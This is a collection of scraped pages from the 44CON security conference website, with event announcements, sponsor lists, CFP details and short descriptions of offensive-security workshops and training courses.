          2. Make sure you’re signed up to the 44CON mailing list (you can do this by ticking the relevant box when purchasing your ticket or here).

          Obligatory fine print:

          Don’t stress love, if you’ve already bought a  ticket and are signed up to our mailing list using the same email address for both, you’re already in the draw.
          Winners will be contacted around the 4th of June 2018. If you would rather someone else had your SteelCon 2018 ticket just let us know and we’ll make it happen.
          Marizel is running the draw, and her decision is final. She cannot be bribed with crisps, breadcakes, nor flat caps, although you’re welcome to try.

          We’d love to see you at SteelCon!

          If you’re planning to attend SteelCon 2018 please come over and say hi. We’ll be the ones selling 44CON tickets, sticking things to people and soldering to our <3’s content. The SteelCon team have two 44CON 2018 tickets to give away, so look out for a chance to win these too.

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at theRoyal College of Physicians in London. Tickets are available now – www.crestandiisp.com. 

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          CRESTCon & IISP Congress 2018

          44CON is exhibiting at CRESTCon & IISP Congress on 3rd May at theRoyal College of Physicians in London. Tickets are available now – www.crestandiisp.com. 

          Now in its sixth year, CRESTCon and IISP Congress is a unique event that brings together leading technical and business information security professionals and is a key date in the industry calendar, attracting an impressive line-up of speakers and senior delegates.

          This year it also welcomes the BCS Security Conference in the third stream. 2017’s event welcomed over 450 delegates, had three conference streams, a bookshop/meeting area, as well as expanded exhibition and demo areas and 2018 is building further on the success of these features. The length of the day is being increased to incorporate further networking and entertainment in response to the feedback received from delegates and sponsors.

          Delegates at the event include senior security, risk and compliance managers from a wide range of public and private sector organisations, along with security consultants and business directors working in the technical information assurance and response industry.

          If you’re attending, please stop by and say hello to Steve and Marizel!

          44CON 2018 CFP Is Open!

          We’re really excited to open our Call For Papers for 44CON 2018. We’re looking forward to seeing all of your submissions on our shiny new CFP system, which promises to be far less painful than the old one.

          44CON consists of 2 dedicated speaking tracks, a dedicated workshop track and combined speaking/workshop track over the two days. Talks range from softer subjects in areas such as governance, law and policy through to reverse engineering, exploitation, tooling and abuse of weird machines. We also have an open evening freely accessible to all (but with pre-registration) on the Wednesday evening before the main event.

          Talks are 45 minutes long, while workshops are 60-120 minutes in length. All submissions are welcome but some useful guidance on particular topics of interest can be found at the CFP submission system.

          As usual, speakers from outside of Fulham, Putney or London Underground Zone 1 will have travel reimbursed. We’ll provide two nights accommodation for speakers or workshop presenters with more than an hour’s travel to a mainline London rail station. We’ll bump that to 3 nights accommodation for any accepted speaker providing a talk and a workshop.

          If you’re interested in submitting something, we highly recommend reading last year’s How To Game The 44CON CFP blog post.

          The CFP closes on Monday 30th April 2018 at 23:59pm UTC. We’ll start notifying speakers by the 4th of June and announce our first round of accepted speakers on the 6th of June at BSides London. Full details of dates can be found on the CFP system.

          44CON 2017 Schedule Available.

          Here you go folks the 44CON 2017 schedule is now available here.

          Go take a look at all the wonderful talks and workshops we have lined up for you! As with all things the schedule could be subject to some last minute changes so make sure you keep an eye out on the day so you don’t miss out.

          If you have’t got your ticket yet there are some still available here.

          We look forward to seeing you all in September.

          CTF 2017

          This year we are delighted to announce that Immersive Labs will be running the 44CON 2017 CTF and they have some great challenges in store for you! Make sure you stop by and see them. 

          They will make their platform available to all 44CON participants, enabling you to take on over 150 cyber security challenges during the conference. Immersive Labs exercises combine both CTF style and sign-posted challenges ranging from Beginner to Advanced. 

          A real-time leaderboard will keep track of participants including the individual labs they’ve completed. Immersive Labs will be providing opportunities for the top 10 users to become “Immersive Original” lab producers which attract a £1000 payment for each lab.

           

           

          The 44CON CFP just closed. You won’t believe what happens next.

          Edit: This post was originally written just after the CFP closed in 2017. If you’re here from a CFP-related link, don’t assume this year’s CFP is closed. If you’re not sure, check the CFP system for the latest info.

          Each year 44CON attracts between 100-200 submissions. Some of these are excellent talks, some are average and some are, well, let’s just say that some are below average. In this blog post I’ll try to go through what happens when the CFP closes and to help you answer the immortal question, “Has my talk been accepted/rejected?”

          Along the way I’ll announce our first accepts, and most importantly explain the why of our CFP process.

          Continue reading “The 44CON CFP just closed. You won’t believe what happens next.”

          Network Forensics: A blog post by Erik Hjelmvik

          I have learned a lot about how to track malware and attackers in network traffic while developing and improving the network forensics tool NetworkMiner throughout the past  10 years. The primary purpose of NetworkMiner has always been to help incident responders and forensic investigators to do their job more efficiently. Even though NetworkMiner is my favourite tool for analysing PCAP files I’m still a regular user of other tools such as  Wireshark, tshark, tcpdump, Argus, ngrep, tcpflow and of course CapLoader. However, incident response and forensic work is much more than just knowing what tools to use. It is more about knowing what data to analyze and why.

          I will teach several of my favourite techniques for analysing intrusions, tracking criminals and doing threat hunting at the Network Forensics Training at 44CON. The participants will learn how to investigate intrusions and find forensic artefacts in a dataset of several gigabytes of captured network traffic. The training primarily focuses on practical analysis techniques for finding and tracing malicious actors, which involves a great deal of hands-on practice with finding evil in PCAP data.

          The first day of training focuses on analysis using only open source tools. The second day primarily covers training on the commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools. This training is not only a unique opportunity to learn how to use NetworkMiner and CapLoader directly from the guy who develops them, it is also a great excuse to spend two full days playing around with PCAP files.

          You can find more details about the training here.

          CRESTCon & IISP Congress 2017

          44CON is exhibiting at CRESTCon & IISP Congress on 19th April at the Royal College of Surgeons in London. Tickets are available now – www.crestandiisp.com. 

          CRESTCon & IISP Congress 2017 focuses on cyber security threats, vulnerabilities and industry challenges.

          Now in its 5th year, CRESTCon & IISP Congress is a unique event that brings together over 400 leading technical and business information security professionals with a choice of three conference streams along with an exhibition, demo area and research library. The event is run by not-for-profit organisations CREST, which represents the technical information security industry, and the Institute of Information Security Professionals, the leading accreditation body and industry authority.

          CRESTCon & IISP Congress in April will feature keynote presentations from a senior NCSC spokesperson and Tarah Wheeler, website security czar at Symantec. Other presentations across the event’s three speaker tracks put the spotlight on topics ranging from how an organisation’s email can be turned against it, protecting wearable technology and cognitive security, through to detecting and bypassing sandboxes, blockchain, and the future of malware.

          Stream 1 delivers presentations that are technical in nature and related to penetration testing, incident response or threat intelligence. Stream 2 will look at the cyber security landscape and attempt to predict changes over the next decade, while stream 3 is all about working together to build and enhance cyber skills.

          If you’re attending, make sure you stop by and say hello to Emma & Steve.

          #####EOF##### 44CON 2013 Sponsors – 44CON

          44CON 2013 Sponsors

          Platinum Sponsor
          nccgroup
          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.
          Gold Sponsors
          MWR InfoSecurity

          MWR InfoSecurity

          http://www.mwrinfosecurity.com

          Established in 2003, MWR InfoSecurity is a research-led information security consultancy. MWR consults with clients around the world, providing specialist advice and services on all areas of security, from mobile through to supercomputers. As a company we invest heavily in knowledge sharing and we are proud to be a part of an event that provides a platform for discussion on the latest thinking and research in the InfoSec arena.

          Silver Sponsors
          msft_logo

          Microsoft

          http://www.microsoft.com/security

          Microsoft is proud to be a sponsor of the 44CON Security Conference. 44CON provides a forum in which security researchers from all over the world, IT pros, and industry luminaries can share insights, knowledge and information to advance security research. We’re happy to be here and glad to be part of the community.

          BT

          BT

          http://www.bt.com/letstalk/security

          BT is one of the world’s leading providers of communications solutions and services operating in 170 countries. Its principal activities include networked IT services; local, national and international telecommunications services; higher-value broadband and internet products and services and converged fixed/mobile products and services.

          Bronze Sponsors
          checksec-logo

          CheckSec

          https://www.checksec.com

          CheckSec was founded by security professionals for security professionals. Our goal is to create technologies that help improve the assessment and management of information security.

          mandalorian

          Mandalorian

          http://www.mandalorian.com

          Mandalorian are an independent UK-based provider of information security services with specialisms in penetration testing and malware analysis. We focus on being the easiest supplier you’ve ever worked with and being fanatical about the quality of our work.

          alien8
          norman

          Norman Shark

          http://normanshark.com

          Norman Shark, founded in Oslo, Norway in 1984, is a world leader in proactive content security solutions and forensics malware tools. The company offers market-leading advanced malware analyzers as well as high-performance network protection against cyber-attacks. Norman’s automated malware analysis technology integrated with our Network Threat Discovery system automatically collects and detects malicious files for protection against targeted attacks. Please visit www.normanshark.comfor more information.

          sensepost

          SensePost

          http://sensepost.com

          The lack of a world-class security conference in the UK has finally been filled by 44CON. No longer does the UK infosec community have to go overseas to see security researchers present cutting-edge research and ideas. SensePost is proud to be associated with 44CON.

          blackberry

          BlackBerry

          http://www.blackberry.com/security

          BlackBerry, a global leader in wireless innovation, revolutionised the mobile industry with the introduction of the BlackBerry® solution in 1999. BlackBerry Security is a world class organisation working to make BlackBerry one of the most secure mobile platforms available by providing an end to end security focus including: driving the BlackBerry security message globally, acquiring and maintaining security accreditations, active involvement in the development of security products, uncovering threats through advanced research, building mitigations into BlackBerry products, and helping to protect customers by rapidly responding to security incidents as they occur.

          44CON Supporters
          raytheon

          Raytheon

          http://www.raytheon.com

          Raytheon has more than 30 years of experience securing some of the world’s most critical and sensitive programmes and systems. We work in some of the most demanding cyber security and intelligence environments in the world and bring our customers the capabilities and cyber business change to ensure they stay ahead of threats. We look at ways organisations can actively disrupt the command and control of an adversary within their domain; the focus is not purely on a layered defence.

          secquest

          SecQuest Information Security

          https://secquest.co.uk

          Following on from presentations at 44CON 2011 & 2012, SecQuest Information Security Ltd is delighted to be “giving something back” to the industry and sponsoring 44CON 2013. SecQuest was formed by two security consultants, previously members of IBM’s X-Force security testing team, with over twenty years of industry experience. SecQuest specialise in “red-team” penetration testing and have expertise in IBM related technologies including iSeries and Lotus Domino along with less well known areas affecting data security such as microwave links, V-SAT, VHF / UHF radio link telemetry and embedded systems.

          crest-new

          CREST

          http://www.crest-approved.org

          CREST is a not-for-profit organisation that represents the technical information security industry, primarily penetration testing, cyber security incident response and security architecture services. CREST offers public and private sector organisations an assurance that the information security advisors they appoint are competent, qualified and professional with current knowledge. It also ensures that the CREST member companies they engage with have the appropriate processes and controls in place to perform the services for which they have been appointed and protect sensitive client-based information.

          #####EOF##### 44CON CYBER SECURITY 2015 Sponsors – 44CON

          44CON CYBER SECURITY 2015 Sponsors

          Platinum Sponsors
          NCC Group

          NCC Group

          http://www.nccgroup.com

          NCC Group is a leading global information assurance company, providing freedom from doubt that all critical material is available, protected, and operating as it should be at all times. Information assurance is delivered through escrow and verification, security testing, audit and compliance, software testing and web performance services.

          Digital Shadows

          Digital Shadows

          http://www.digitalshadows.com

          Digital Shadows is a cyber intelligence company that protects organisations from data loss and targeted cyber attack. By applying our award-winning blend of expertise and technology we enable organisations to exploit social, cloud and mobile technologies while keeping their security and reputations intact. Our managed services monitor millions of data sources across the visible and dark web to deliver focussed, relevant intelligence about the risks you need to mitigate.

          f-secure

          F-Secure

          http://f-secure.com

          F-Secure are an online security and privacy company, founded in 1988 in Finland. Trusted by millions of users worldwide, F-Secure are pioneers in providing Security as a Service to SMBs as well as one of the first to introduce mobile security into the market.
          Due to their flexibility, technical competence and ease of management, F-Secure are market leaders within the Internet Service Provider and Mobile Operator space, with over 250 operators, including Virgin Media and TalkTalk, choosing F-Secure solutions to protect their millions of customers.


          Exhibitors
          Logically Secure

          Logically Secure

          http://www.cyber-cpr.com

          CyberCPR is a safe haven where Incident Managers, Analysts, Executives and support staff can plan and coordinate cyber incident remediation activities. Designed by seasoned IR professionals CyberCPR is designed support staff so they can work faster and more efficiently on all aspects of IR thus reducing organisational risks and saving money.

          Stroz Friedberg

          Stroz Friedberg

          http://www.strozfriedberg.com/

          Founded in 2000, Stroz Friedberg is a global leader in investigations, intelligence, and risk management services. It offers an assembly of the brightest minds in the fields of digital forensics, cybercrime and incident response, security science, forensic accounting, compliance, due diligence, data disclosure and analytics.

          Cortex Insight

          Cortex Insight

          http://www.cortexinsight.com/

          Cortex Insight is a High End specialist end-to-end provider of security consulting services. Offering a range of services designed to tackle security challenges faced by the Enterprise.

          CheckSec

          CheckSec

          https://checksec.com/

          Our flagship product, Canopy – Security Assessment Manager, is focused on helping security teams organise and manage their security testing and assessments. Canopy introduces managed workflows into assessments, and also brings efficiencies to every engagement through reusable content (Vulnerability Knowledge-Base, Report Content, etc.), quickly converting tool results to findings, and report automation.

          PQChat

          PQChat

          https://pq-chat.com

          At Post-Quantum we specialise in offering post-quantum secure solutions. Our PQChat Enterprise secure messaging system uses our Never-The-Same technology based on the Robert McEliece cryptosystem.

          Context Information Security

          Context Information Security

          http://www.contextis.com

          Context is an independently operated cyber security consultancy, founded in 1998 and focusing on providing highly skilled consultants to help organisations with their information security challenges. We work with some of the world’s most high profile blue chip companies and government organisations.


          Event Supporters
          rhul

          Royal Holloway

          https://www.royalholloway.ac.uk/isg/

          We have a long history of world-class research into all areas of information and cyber security and have a world-leading group of academics and industrial contacts. Our research has led to us being recognised as an Academic Centre of Excellence in Cyber Security Research (ACE-CSR). There are eight ACEs in the UK, chosen by a panel appointed by the EPSRC and GCHQ.

          Women In Security

          Women In Security

          http://www.isc2chapter-london.co.uk/women-in-security

          The Women in Security group is an exciting initiative formed by professionals of the Information Security field. The mission of the group is to raise the profile of women in the information security industry.

          IISP

          IISP

          https://www.iisp.org/

          The Institute of Information Security Professionals (IISP) is a not-for-profit organisation, owned by its members and dedicated to raising the standard of professionalism in information security and the industry as a whole.

          ISSA

          ISSA

          http://www.issa-uk.org/

          The Information Systems Security Association (ISSA)® is a not-for-profit, international organisation of information security professionals. It provides networking, educational forums, research opportunities, publications, and speaking opportunities that enhance the knowledge, skill and professional growth of its members. ISSA bills itself as the community of choice for international security professionals.

          White Hat Rally 2015: Way Out West

          White Hat Rally 2015: Way Out West

          http://info.whitehatrally.org

          From the Welsh borders, to the west coast, from north to south, with castles, dragons and some amazing challenges we are taking on the wild west frontier over the long weekend 18 – 20 September 2015.


          Media Partners
          IT Security Guru

          IT Security Guru

          http://itsecurityguru.org

          IT Security Guru is a website containing industry news, blogs, videos, jobs and links to the best stories on the internet. Every day we look at the big stories, talk to the key people and bring the main topics to the end-user audience. Since we relaunched our website in January 2014 we have been delighted to support community events such as 44CON and we look forward to being involved in the build up to the show and attending the conference in September.


          Event Partners
          Antipøde

          Antipøde

          http://www.blackandwhitecoffee.co.uk

          Having spent many years in Brisbane, Australia, behind the machines in a few of its most renowned coffee hangouts; Harvey’s (under chef PJ McMillan), Au Cirque and The Little Larder, it became quickly apparent after moving to London, that the city was crying out for the simple things in life, like a good flat white.

          Our Raison d’être is simple – to provide the London public with the quality and standards associated with Australian coffee culture.

          ESW Solutions

          ESW Solutions

          http://www.eswav.com

          Founded in 1995, ESW Solutions has quickly become a major force in the Audio Visual industry – building on its first class reputation for customer service, quality and commitment. From a large multi room European conference to a small meeting we have the experience to make your event successful. We also produce live events for a wide range of clients, Awards Ceremonies, Talent Competitions, Festival Stages etc.

          ESW is also the home to Talking Slides a unique product that gets content presented at your conference online and ready to view in a simple, cost-effective and hassle-free manner. We attend your event and capture the presentations as they happen. However, the recording of your event is just the beginning.

          We take the high-definition presentation recordings and host them within our Talking Slides management system, complete with search facilities, registration options and even pay-per-view access.

          #####EOF##### Attending – 44CON

          Attending

          Our next event is 44CON 2019 on 11th, 12th & 13th of September 2019. It will take place at the ILEC Conference Centre, London and will kick off on Wednesday 11th September at 6:30pm with our Community Evening. Registration will start at 6pm.

          Entry is free on Wednesday evening but you will have to register beforehand (details closer to the event).

          Press registration is handled separately to normal attendance registration. Please see here for more info.

          Mark your calendars:

          Next 44CON Conferences will take place:

          • 2019: 11th, 12th  & 13th of September 2019
          • 2020: 9th, 10th & 11th of September 2020

          In the spirit of making 44CON safe and enjoyable for everyone, please ensure you adhere to our house rules at all times at and around the event.

          More information will be added to this page as it becomes available so please check it regularly. You can also keep a look out on our twitter page @44CON or sign up to our mailing list where you will be the first to know about all things 44CON.

          #####EOF##### 44CON 2017 Workshops – 44CON

          44CON 2017 Workshops

          ARM Assembly and Shellcode Basics

          Presented by: Saumil Shah

          A two hour workshop on writing ARM Shellcode from scratch. This workshop will cover some simple ARM assembly, and then two shellcode examples: A simple execve() shell and a fully working Reverse Shell. The shellcode will be tested in an ARM QEMU Emulator as well as on actual ARM hardware.

          Participants will be provided with ARM images running on QEMU for testing their shellcode. A shared Raspberry Pi-2 cluster will be made available for testing the shellcode on proper ARM hardware. Participants are encouraged to also bring their Raspberry PI-2 devices to the workshop.

          Introduction to Windows Logical Privilege Escalation

          Presented by: James Forshaw

          This workshop will go through an introduction to finding and exploiting logical privilege escalation vulnerabilities on Windows. More and more code running on Windows is done inside sandboxes or as non-administrators. This makes privilege escalation more important than ever. Memory corruptions are a common way of gaining higher privileges but Windows has been introducing more mitigations making exploitation harder. Logical vulnerabilities on the other hand are typically not affected by mitigations such as ASLR or DEP, but they’re generally more difficult to find. As an added complication they cannot be easily discovered through typical fuzzing approaches. Some of the topics to be presented will be:

          • Windows Internals as relevant to privilege escalation
            • Types of sandboxes, restricted and low box tokens
            • Under the hood
          •  Attack surface analysis:
            • Probing the sandbox and the system
            • COM services
            • Exposed device drivers
          • File and registry vulnerabilities
            • How to find them and what to look for
            • Exploitation
          • Token vulnerabilities
            • How to find them and what to look for
            • Exploitation
          • UAC and unusual unfixed vulnerabilities
          • Working examples of based on previous vulnerabilities

          Attendees are welcome to participate through the workshop by having access to a Windows 10 32 bit VM installation. Access to all tools and examples demonstrated on the day will be provided.

          UAC 0day, all day!

          Presented by: Ruben Boonen

          This workshop is available to attendees of all levels, however, a basic familiarity with Process Monitor and the Windows API are recommended. The workshop will provide the required knowledge to find, analyze and exploit process workflows which allow an attacker to elevate their privileges from Medium to High integrity. The workshop is divided into the following sections.

          Auto-Elevation:

          • Identifying auto-elevating processes
          • Analyzing process workflows
          • Finding UAC bypass targets

          Elevated File Operations:

          • Using the IFileOperation COM object
          • Tricking the Process Status API (PSAPI)

          Getting UAC 0day (Pre RS2):

          Looking forward:

          • Triaging Windows 10 Redstone 2
          • Leaving IFileOperation behind
          • COM objects & Fileless elevation​

          The workshop has intense hands-on labs where attendees will put the theory into practice. After attending you will immediately be able to apply this knowledge in the field. The next time someone tells you the default UAC settings are sufficient you will be able to set them straight!

          Breaking Crypto the Easy Way With FeatherDuster

          Presented by: Daniel Crowley

          While there is a very large and rich body of academic work in cryptography, there is a comparatively small body of work regarding practical cryptographic issues. While it’s useful, possible, interesting, and even easy at times to apply 10 year old attacks to modern applications and systems, it doesn’t make for a good thesis paper. There’s also a general reluctance from application security folk to learn cryptography.

          FeatherDuster is a tool which attempts to bridge the gap between cryptographers and application security professionals by making crypto review and exploitation as simple as possible, like Metasploit for crypto. In some cases, FeatherDuster can identify and exploit practical crypto flaws given nothing other than a series of encrypted messages.

          This workshop will show attendees how to use FeatherDuster, from the easy-mode button that is FeatherDuster’s autopwn feature, all the way to writing your own FeatherModules and Python scripts which leverage FeatherDuster’s cryptanalysis module, Cryptanalib.

          Developing Burp Suite Extensions

          Presented by: Luca Carettoni

          This workshop covers building Burp Suite extensions from start to finish. Starting with an introduction to Burp Suite, the Burp Extender and the Burp Suite APIs, the workshop will then cover setting up the IDE and generating a basic “Hello Burp” extension, and then move on to how to build a simple Burp Scanner extension

          The workshop is suitable for both web application security specialists and developers. Attendees are expected to have rudimental understanding of Burp Suite as well as basic Object-Oriented Programming experience. While Burp extensions are developed live in Java, attendees can work on Python or Ruby since all exercises are also provided in those languages.

          Attendees should bring their own laptop with the latest Java JDK installed, and a working IDE. While we develop in NetBeans, Eclipse and IDEA are also good alternatives.

          Reverse Engineering Windows Malware 101 Workshop

          Presented by: Amanda Rousseau

          Reverse engineering already sounds like black magic, when in reality it’s just lot’s of practice and strong foundations in computer science concepts. You might not always remember what you learned in computer science classes or understood it enough to actually apply it to the real world. The best way to learn is by getting hands on practice. In this workshop, the main take away is learning how to set analysis goals. By using tools and computer science concepts you can work step by step to those analysis goals. This workshop provides the fundamentals of reversing engineering (RE) Windows malware using a hands-on experience with RE tools and techniques. Attendees will be introduced to RE terms and processes, followed by creating a basic x86 assembly program, and reviewing RE tools and malware techniques. The workshop will conclude by attendees performing hands-on malware analysis that consists of Triage, Static, and Dynamic analysis.

          Prerequisites: Basic understanding of programming C\C++, Python, or Java Requirements: Laptop with an OS that supports VirtualBox, and wifi connection
          Provided: A virtual machine and tools will be provided

          Cracking HiTag2 Crypto – Detailed Look at the Academic Attacks

          Presented by: Kevin Sheldrake

          NOTE: The corresponding talk “Cracking HiTag2 Crypto – Weaponising Academic Attacks for Breaking and Entering” is a pre-requisite for this workshop. You must attend the talk if you plan to attend the workshop.

          HiTag2 is an RFID technology operating at 125KHz.  It is distinguished from many others in the same field by its use of 2-way communications for authentication and its use of encryption to protect the data transmissions – the majority of RFID technologies at 125KHz feature no authentication or encryption at all.  As a result it has been widely used to provide secure building access and has also been used as the technology that implements car immobilisers.

          In 2012, academic researchers Roel Verdult, Flavio D. Garcia and Josep Balasch published the seminal paper, ‘Gone in 360 Seconds: Hijacking with Hitag2’ that presented three attacks on the encryption system used in HiTag2.  They implemented their attacks on the Proxmark 3 device (an RFID research and hacking tool) and gave several high-profile demonstrations, but didn’t release any of their code or tools.  Since then, the forums supporting Proxmark 3 and RFIDler (another RFID hacking tool) have received many requests for implementations of these attacks, but so far none have been forthcoming.

          In this workshop I will explain how HiTag2 RFID works in detail, including the PRNG and the authentication and encryption protocols, and will present my own implementations of the attacks, written for RFIDler and supported by desktop computers.  The first attack uses a nonce replay to misuse the integrity protection of the comms in order to allow access to the readable RFID tag pages without needing to know the key.  The second and third attacks use time/memory trade-off brute force and cryptanalytic attacks to recover the key, such that the contents of the read-protected pages can also be accessed.  The attacks are weaponised and permit cloning of tags, which I will demonstrate.

          All tools will be publicly released.

          A Hands On Introduction To Software Defined Radio

          Presented by: Didier Stevens

          Software Defined Radio is a fascinating playfield for hackers. But the learning curve is steep, and SDR devices are expensive. This two hour hands on workshop introduces SDR via a gentle learning curve, and with cheap devices, so that everyone can participate. Operating SDRs via the open source software GNU Radio offers a wealth of possibilities, but it is hard for beginners to start with GNU Radio. You need a good grasp of the radio concepts to find your way through the software. SDR is quite different from analogue radio, and for most attendees, even analogue radio is quite mysterious.

          With GNU Radio and GNU Radio Companion, I will guide the attendees through a set of exercises (specially designed for this workshop) intended to familiarize them with radio technology, SDR, GNU Radio and GNU Radio Companion. Each attendee should bring their own laptop and Didier will supply 20 cheap SDR devices (USB digital TV receivers RTL2832U) and a couple of more performant devices, like the HackRF One, a WiSpy, and a handheld digital spectrum analyzer. We will boot from a Live CD and start with simple exercises to understand SDR. Because of the limited number of devices (20 devices), the workshop is limited to 20 attendees. But attendees can bring their own RTL2832U.

          How to Hack Radios: Hands-On with RF Physical Layers

          Presented by: Matt Knight and Marc Newlin

          The Age of the Radio is upon us: wireless protocols are a dime a dozen thanks to the explosion of mobile devices and the Internet of Things. While proprietary wireless solutions may offer performance benefits and cost savings over standards like 802.11 or Bluetooth, their security features are rarely well-exercised due to a lack of access to these interfaces. The adoption of Software Defined Radio (SDR) by the security research community has helped shift this balance, however SDR remains a boutique skillset. Join us as we lift the veil on SDR and show that a PhD is not needed to pwn the Internet of Things’ Radios.

          This workshop offers an applied tutorial on how to apply Software Defined Radio, with an emphasis on the “Radio” part. Rather than glazing over RF basics, we will frame our entire discussion about reverse engineering wireless systems around digital radio fundamentals.

          We begin with an offensively short crash course in digital signal processing and RF communication, covering just enough to be dangerous, before introducing a reverse engineering workflow that can be applied to just about any IoT wireless system. The bulk of this session will demonstrate how this workflow can be applied to recover and inject packets from/into a variety of devices with proprietary modulations by walking through it, live and in detail, with attendees actively contributing to reverse-engineered solutions and working along in parallel.

          Attendees should expect to walk away with practical knowledge of how to apply SDR to examine and deconstruct proprietary wireless protocols. We encourage attendees to bring along their own SDR hardware, though we’ll provide a handful of RTL-SDRs and live USB images for those who lack equipment. Finally, we will release all GNU Radio flowgraph templates and shell scripts for further hacking and development.

          Capture-The-Flag 101

          Presented by: Olivier Bilodeau

          This workshop is a deep-dive into Capture-The-Flag (CTF) competitions for CTF first timers. It will introduce CTFs and then assist both teams and individuals prepare for them and evolve their applied cybersecurity skills in the process.

          The workshop will have various levels (easy, medium, hard) of CTF challenges in several categories (binaries, Web, crypto) and hints and solutions will be provided during the workshop.

          #####EOF##### Advanced Windows Tradecraft – 44CON

          Advanced Windows Tradecraft

          Presented By: Nikhil Mittal

          Organizations with a mature security model want to test their security controls against sophisticated adversaries. Red teams that want to simulate such adversaries need an advanced tradecraft. Such a tradecraft must include the ability to adapt to the target environment, modify existing tactics and techniques to avoid detection, swiftly switch between tools written in different languages supported on Windows, break out of restrictions, utilize functionality abuse and keep up with the game of bypassing countermeasures. If you want to take your Windows tradecraft to the next level then this is the course for you.

          This training takes you through a tradecraft for Red Teaming a Windows environment with nothing but trusted OS resources and languages. We will cover multiple phases of a Red Team operation like initial foothold, enumeration, privilege escalation, persistence, lateral movement, exfiltration etc. in a fully updated and patched lab with countermeasures enabled.

          The 3 day course will take place on the 9th, 10th and 11th of September 2019 at the Novotel London West
          Cost is £ 1,950 (inc VAT). Buy your place in our shop now.

          Learning Objectives

          Some of the topics covered in the class:

          • Offensive C#, PowerShell, Jscript/VBScript
          • Bypassing Application Whitelisting
          • Bypassing host countermeasures
          • Evading process tree based detection
          • Evading advanced logging (Command line, PowerShellv5, Sysmon etc.)
          • In-memory assembly and shellcode execution
          • Offensive WMI
          • COM hijacking
          • Advanced Client Side Attacks on restricted and secure environments
          • Local and domain privilege escalation

          Attendees will get free one month access to a lab configured like an enterprise environment during and after the training.

          Course Outline

          Day 1:

          • Introduction to the methodology
          • Windows as an attack platform
          • Offensive PowerShell
          • PowerShell without powershell.exe
          • Offensive C#
          • Offensive Jscript/VBScript
          • Offensive WMI

          Day 2:

          • COM Hijacking
          • Bypassing application whitelisting
          • Bypassing host countermeasures
          • Evading process tree based detection
          • Evading advanced logging (Command line, PowerShellv5, Sysmon etc.)
          • Advanced Client Side Attacks in restricted environment (AWL and ASR enabled)

          Day 3:

          • Local and Domain privilege escalation
          • Persistence (on host, domain and forest)
          • Advanced Lateral Movement
          • Defenses and Detection

          Target Audience

          Red teamers and penetration testers who want to take their Windows tradecraft to the next level will find this course very useful. Blue teamers and security professionals who want to understand the how sophisticated adversaries target their organization should take this course.

          Student Requirements

          • Prior experience with Red Teaming or penetration testing.
          • Prior experience with using Windows as an attack platform will be helpful.

          What to Bring

          • System with 4 GB RAM and ability to install OpenVPN client and RDP to Windows boxes. Privileges to disable/change any antivirus or firewall.

          Students will be provided with

          • Attendees will get free one month access to a lab configured like an Enterprise environment during and after the training.
          • Free one month subscription to all courses on PenesterAcademy.com.
          • Free one month access to non-premium labs on AttackDefense.com

          About the Trainer

          Lead Instruction – Nikhil Mittal

          Nikhil Mittal is a hacker, infosec researcher, speaker, blogger and enthusiast. His area of interest includes red teaming, active directory security, attack research, defense strategies and post exploitation research. He has 10+ years of experience in red teaming.

          He specializes in assessing security risks at secure environments that require novel attack vectors and “out of the box” approach. He has worked extensively on Active Directory attacks, defense and bypassing detection mechanisms and Offensive PowerShell for red teaming. He is creator of multiple tools like Nishang, a post exploitation framework in PowerShell and Deploy- Deception a framework for deploying Active Directory deception. In his spare time, Nikhil researches on new attack methodologies and updates his tools and frameworks.

          Nikhil has held trainings and boot camps for various corporate clients (in US, Europe and SE Asia), and at the world’s top information security conferences.

          He has spoken/trained at conferences like Defcon, BlackHat, CanSecWest, BruCON, 44CON and more.

          Book your 44CON 2019 training course now!

           

          #####EOF##### 44CON London 2015 Training – 44CON

          44CON London 2015 Training

          All training courses are run on the 7th – 15th September 2015 at TBC venue

          Presented by: Saumil Shah

          A class about the art and craft of vulnerability discovery and subsequent exploit development. It’s an intense hands on course.

          Course Length: 3 days

          Presented by: MDSec (Marcus Pinto)

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          Course Length: 2 days

          Presented by: Dominic Chell

          The course follows chapters 1-9 of the Mobile Application Hacker’s Handbook, with a strong focus on practical attacks. Over the 2-day training course delivered by the lead author of the book, delegates will learn the tricks and techniques to hack mobile applications on the iOS and Android platforms.

          Course Length: 2 days

          Presented by: Andrea Barisani

          The ARM® TrustZone® technology, in contrast to traditional TPMs, allows developers to engineer custom trusted platform modules by enforcing domain separation, between the “secure” and “normal” worlds, that propagates throughout System on a Chip (SoC) components, and therefore not only limited to the CPU core. Students will gain first hand experience on the low level concepts and ARM assembly required to audit and utilize implementations of the TrustZone® technology.

          Course Length: 1 day

          #####EOF##### 44CON LONDON 2015 Presentations – 44CON

          44CON LONDON 2015 Presentations

          Most of the presentations are available to view on Vimeo.

          Meterpreter: Understanding the New Shiny

          Presented By: OJ Reeves

          The last couple of years have seen Meterpreter move forward leaps and bounds when it comes to new features and stability. Metasploit users worldwide continue to make use of it for its core feature set that is already well known, but are yet to benefit from the new features that are starting to make it a more compelling tool for red team engagements.

          The goal of this talk will be to bring people up to speed on how Meterpreter has changed, evolved and become what it is in 2015. Old features will be covered, and new features will be discussed in depth, with a focus on how those new features can be used to help red teamers establish and maintain a stronger foothold in their target’s network.

